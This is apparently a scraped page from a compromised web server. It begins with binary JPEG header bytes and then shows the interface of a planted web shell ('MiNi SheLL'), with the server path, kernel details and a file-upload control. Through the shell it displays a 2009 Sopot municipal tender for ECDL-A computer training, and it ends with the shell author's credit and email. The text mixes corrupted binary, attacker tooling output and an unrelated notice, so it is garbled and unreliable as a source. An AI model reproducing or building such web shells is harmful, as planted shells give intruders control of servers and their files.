JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/147252-N-2009.html

<p class="kh_header"><b>Sopot: 2.1	Przedmiotem Zamówienia  jest zorganizowanie i przeprowadzenie na rzecz Zamawiającego 
i Partnerów Projektu cyklu szkoleń z zakresu zaawansowanej obsługi pakietu MS Office (European Computer Driving Licence Advanced, ECDL-A), przygotowujących do certyfikacji z wymienionego zakresu. W ramach zamówienia Wykonawca zobowiązany jest również do zapewnienia materiałów szkoleniowych oraz organizacji przerw poczęstunkowych w trakcie zajęć.</b><br>
<b>Numer ogłoszenia: 147252 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Sopotu , ul. Tadeusza Kościuszki 25/27, 81-704 Sopot, woj. pomorskie, tel. 058 5213750, faks 058 5510133.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 2.1	Przedmiotem Zamówienia  jest zorganizowanie i przeprowadzenie na rzecz Zamawiającego 
i Partnerów Projektu cyklu szkoleń z zakresu zaawansowanej obsługi pakietu MS Office (European Computer Driving Licence Advanced, ECDL-A), przygotowujących do certyfikacji z wymienionego zakresu. W ramach zamówienia Wykonawca zobowiązany jest również do zapewnienia materiałów szkoleniowych oraz organizacji przerw poczęstunkowych w trakcie zajęć..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cykl szkoleń obejmować będzie 80 godzin szkoleniowych, gdzie 1 godzina szkoleniowa oznacza 45 minut. Zakres merytoryczny obejmować będzie cztery następujące bloki tematyczne:
	Blok tematyczny 1: Przetwarzanie tekstu			(20 godz., 3 dni szkoleniowe)
	Blok tematyczny 2: Arkusze kalkulacyjne 			(20 godz., 3 dni szkoleniowe)
	Blok tematyczny 3: Bazy danych				(20 godz., 3 dni szkoleniowe)
	Blok tematyczny 4:	 Grafika menedżerska i prezentacyjna	(20 godz., 3 dni szkoleniowe) 

2.3	Szkolenia polegać powinny w szczególności na przeprowadzeniu na rzecz pracowników Zamawiającego i Partnerów Projektu:
	konwersatorium w zakresie poszczególnych Bloków tematycznych z wykorzystaniem prezentacji multimedialnych;
	zajęć laboratoryjnych poświęconych rozwiązywaniu problemów praktycznych 
w laboratorium komputerowym.

2.4	Zakres szkoleń, liczbę uczestników sesji szkoleniowych, materiały szkoleniowe oraz przewidziany czas i harmonogram zajęć określają dalsze części niniejszej SIWZ - Załącznik nr 1.
2.9	Zamawiający, zgodnie z budżetem projektu zaakceptowanym przez Instytucję Pośredniczącą II stopnia, może przeznaczyć na usługę zakresie szkolenia European Computer Driving Licence Advanced (ECDL-A) łączną kwotę 160.160,00 zł brutto.

3	TERMIN I MIEJSCE WYKONANIA ZAMÓWIENIA

3.1	Zamawiający wymaga, aby Zamówienie zostało wykonane zgodnie z następującym układem i harmonogramem grup szkoleniowych:
3.1.1	Zamówieniem objętych zostanie 7 grup szkoleniowych o liczebności po 15 uczestników każda (razem 105 osób).
3.1.2	Grupy szkoleniowe objęte Zamówieniem uczestniczą w szkoleniu kolejno według następującego harmonogramu:

	Blok
tematyczny
nr 1	Blok
tematyczny
nr 2	Blok
tematyczny
nr 3	Blok
tematyczny
nr 4
Grupa 1 (E1)	15-17.06.2009	22-24.06.2009	29.06-01.07.2009	06-08.07.2009
Grupa 2 (E2)	13-15.07.2009	20-22.07.2009	27-29.07.2009	03-05.08.2009
Grupa 3 (E3)	10-12.08.2009	17-19.08.2009	24-26.08.2009	31.08-02.09.2009
Grupa 4 (E4)	07-09.09.2009	14-16.09.2009	21-23.09.2009	28-30.09.2009
Grupa 5 (E5)	05-07.10.2009	12-14.10.2009	19-21.10.2009	26-28.10.2009
Grupa 6 (E6)	02-04.11.2009	16-18.11.2009	23-25.11.2009	30.11-02.12.2009
Grupa 7 (E7)	07-09.12.2009	14-16.12.2009	04-06.01.2010	11-13.01.2010


3.2	Miejsce wykonania Zamówienia:

3.2.1	Dla każdej z wymienionych grup Wykonawca zapewni laboratorium komputerowe wyposażone w odpowiadającą wielkości szkolonej grupy liczbę stanowisk komputerowych z licencjonowanym oprogramowaniem, a także stanowisko dla prowadzącego wyposażone w sprzęt i urządzenia niezbędne do właściwego prowadzenia zajęć.
3.2.2	Zamawiający wymaga, aby wyżej wymienione laboratorium komputerowe zlokalizowane było na terenie Trójmiasta.

3.3	Zamawiający wymaga, aby Zamówienie zostało wykonane w porządku zawartym 
w harmonogramie, o którym mowa w p. 3.1.2 niniejszej SIWZ. W ramach jednego dnia szkoleniowego wymiar zajęć nie powinien przekroczyć 8 godzin szkoleniowych. 
W zależności od wymiaru godzinowego zajęć, w trakcie każdego z dni szkoleniowych Wykonawca zobowiązuje się do zorganizowania 2-3 przerw poczęstunkowych (kawa, herbata, kanapki) dla uczestników szkolenia.

3.4	Szczegółowy harmonogram godzinowy oraz miejsce wykonania Zamówienia ustalone zostaną z Wykonawcą na etapie podpisywania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.50.00.00-9, 80.53.31.00-0, 80.53.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPOSÓB DOKONYWANIA OCENY SPEŁNIENIA TYCH WARUNKÓW

1.1	Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się wykonawcy, którzy:
1.1.1	Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.1.2	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania Zamówienia;
1.1.3	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia;
1.1.4	Nie podlegają wykluczeniu z Postępowania z powodów, o których mowa w art. 24 ust. 1 i 2 Ustawy.

1.2	Zamawiający ustala następujące szczegółowe warunki udziału w Postępowaniu:
1.2.1	W zakresie warunku wskazanego w punktach od 4.1.1 do 4.1.4 ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w punkcie 5.1
1.2.2	W zakresie warunku wskazanego w punkcie 4.1.2 wymagane jest posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia, tj. przeprowadzenia w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, szkolenia lub szkoleń 
z zakresu zaawansowanej obsługi pakietu MS Office (European Computer Driving Licence Advanced, ECDL-A) w ramach wszystkich czterech Bloków tematycznych, których dotyczy Zamówienie, skierowanych do co najmniej stu beneficjentów ostatecznych. Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 5.1.2.


2	OŚWIADCZENIA I DOKUMENTY, JAKIE POWINNI DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW OKREŚLONYCH W ROZDZIALE 4

2.1	W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
2.1.1	Warunki ogólne określone w punkcie 4.1 SIWZ - wraz z ofertą każdy 
z Wykonawców powinien złożyć:
a)	oświadczenia, że spełnia warunki, o których mowa w art. 22 ust. 1  i art. 24 ust. 1 Ustawy (Załącznik nr 3 do niniejszej SIWZ).
b)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2.1.2	Warunki szczegółowe określone w punkcie 4.2.2 SWIZ - wraz z ofertą każdy 
z Wykonawców powinien złożyć wykaz wykonanych co najmniej szkolenia lub szkoleń 
z zakresu zaawansowanej obsługi pakietu MS Office (European Computer Driving Licence Advanced, ECDL-A) w ramach wszystkich czterech Bloków tematycznych, których dotyczy Zamówienie, skierowanych do co najmniej stu beneficjentów ostatecznych., z podaniem dat wykonania, odbiorców usług i wartości zamówienia oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie.
2.1.3	Wszystkie dokumenty, z zastrzeżeniem poniższego punktu 5.1.4   mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę (z zastrzeżeniem art.9.ust. 3 ustawy Pzp) - zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 19.05.2006r. (Dz. U. z 2006 r. Nr 87, poz. 605) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
2.1.4	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo (oryginał) określające jego zakres i podpisane przez mocodawcę (osobę fizyczną lub osoby reprezentujące osobę prawną). Kserokopia pełnomocnictwa musi być potwierdzona za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub przez notariusza.
2.1.5	Składanie ofert przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
a)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich pełnomocnika,
b)	ofertę, oświadczenie o spełnieniu warunków udziału w postępowaniu określonych               w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz dokumenty poświadczające spełnienie warunków udziału w postępowaniu, podpisuje (a w przypadku dokumentów w formie kserokopii - poświadcza za zgodność z oryginałem) pełnomocnik, o którym mowa wyżej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia,
c)	dokument wymieniony w punkcie 5.1.1.b, dotyczy każdego z wykonawców wspólnie ubiegający się o udzielenie zamówienia. 
d)	Pozostałe dokumenty składa pełnomocnik w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.
e)	przypadku wyboru oferty najkorzystniejszej wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy najpóźniej przed podpisaniem umowy o zamówienie publiczne przedłożyć zamawiającemu umowę regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6	OŚWIADCZENIA I DOKUMENTY, JAKIE POWINNI DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW OKREŚLONYCH W ROZDZIALE 4

6.1	W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
6.1.1	Warunki ogólne określone w punkcie 4.1 SIWZ - wraz z ofertą każdy 
z Wykonawców powinien złożyć:
c)	oświadczenia, że spełnia warunki, o których mowa w art. 22 ust. 1  i art. 24 ust. 1 Ustawy (Załącznik nr 3 do niniejszej SIWZ).
d)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6.1.2	Warunki szczegółowe określone w punkcie 4.2.2 SWIZ - wraz z ofertą każdy 
z Wykonawców powinien złożyć wykaz wykonanych co najmniej szkolenia lub szkoleń 
z zakresu zaawansowanej obsługi pakietu MS Office (European Computer Driving Licence Advanced, ECDL-A) w ramach wszystkich czterech Bloków tematycznych, których dotyczy Zamówienie, skierowanych do co najmniej stu beneficjentów ostatecznych., z podaniem dat wykonania, odbiorców usług i wartości zamówienia oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie.
6.1.3	Wszystkie dokumenty, z zastrzeżeniem poniższego punktu 5.1.4   mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę (z zastrzeżeniem art.9.ust. 3 ustawy Pzp) - zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 19.05.2006r. (Dz. U. z 2006 r. Nr 87, poz. 605) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
6.1.4	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo (oryginał) określające jego zakres i podpisane przez mocodawcę (osobę fizyczną lub osoby reprezentujące osobę prawną). Kserokopia pełnomocnictwa musi być potwierdzona za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub przez notariusza.
6.1.5	Składanie ofert przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
f)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich pełnomocnika,
g)	ofertę, oświadczenie o spełnieniu warunków udziału w postępowaniu określonych               w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz dokumenty poświadczające spełnienie warunków udziału w postępowaniu, podpisuje (a w przypadku dokumentów w formie kserokopii - poświadcza za zgodność z oryginałem) pełnomocnik, o którym mowa wyżej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia,
h)	dokument wymieniony w punkcie 5.1.1.b, dotyczy każdego z wykonawców wspólnie ubiegający się o udzielenie zamówienia. 
i)	Pozostałe dokumenty składa pełnomocnik w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.
j)	przypadku wyboru oferty najkorzystniejszej wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy najpóźniej przed podpisaniem umowy o zamówienie publiczne przedłożyć zamawiającemu umowę regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sopot.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sopotu Wydział Strategii Rozwoju Miasta, Referat Europejskiego Funduszu Społecznego i Przedsiębiorczości
ul. Kościuszki 25/27, 81-704 Sopot.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 11:00, miejsce: Kancelarii Ogólnej (pokój nr 16) Urzędu Miasta Sopotu, 
ul. Kościuszki 25/27, 81-704 Sopot, w godzinach pracy Urzędu (poniedziałek: 1000-1800, wtor.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com